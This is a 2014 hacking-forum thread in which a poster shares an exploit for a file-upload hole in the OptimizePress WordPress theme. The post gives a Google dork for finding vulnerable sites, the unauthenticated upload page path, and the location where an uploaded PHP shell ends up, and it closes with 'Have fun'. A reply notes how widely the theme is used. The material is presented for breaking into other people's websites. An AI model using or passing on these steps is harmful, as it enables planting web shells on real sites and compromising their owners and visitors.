Sinisterly
WordPress OptimizePress Themes File Upload Vulnerability - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: WordPress OptimizePress Themes File Upload Vulnerability (/Thread-WordPress-OptimizePress-Themes-File-Upload-Vulnerability)



WordPress OptimizePress Themes File Upload Vulnerability - hacker1989 - 02-05-2014

Hello HC,
Today I am gonna share this exploit with you. :Thumbs-Up:

Google Dork :
Code:
inurl:/wp-content/themes/OptimizePress/ inurl:/wp-content/uploads/optpress/

Search on google with one of this dork & click on one result . And replace your url to be like this .
Code:
http://127.0.0.1/wp-content/themes/OptimizePress/lib/admin/media-upload.php

If the site is vulnerable to upload shell ,you will see a page like a photo I posted & you can upload your shell directly from there .

[Image: image.png]

If you can upload your php shell successfully,then your shell path will be here .
Code:
http://127.0.0.1/wp-content/uploads/optpress/images_comingsoon/yourshell.php

Have fun .


RE: WordPress OptimizePress Themes File Upload Vulnerability - lacamoura - 02-09-2014

waw seems like avery website on the internet uses this plugin, get hacked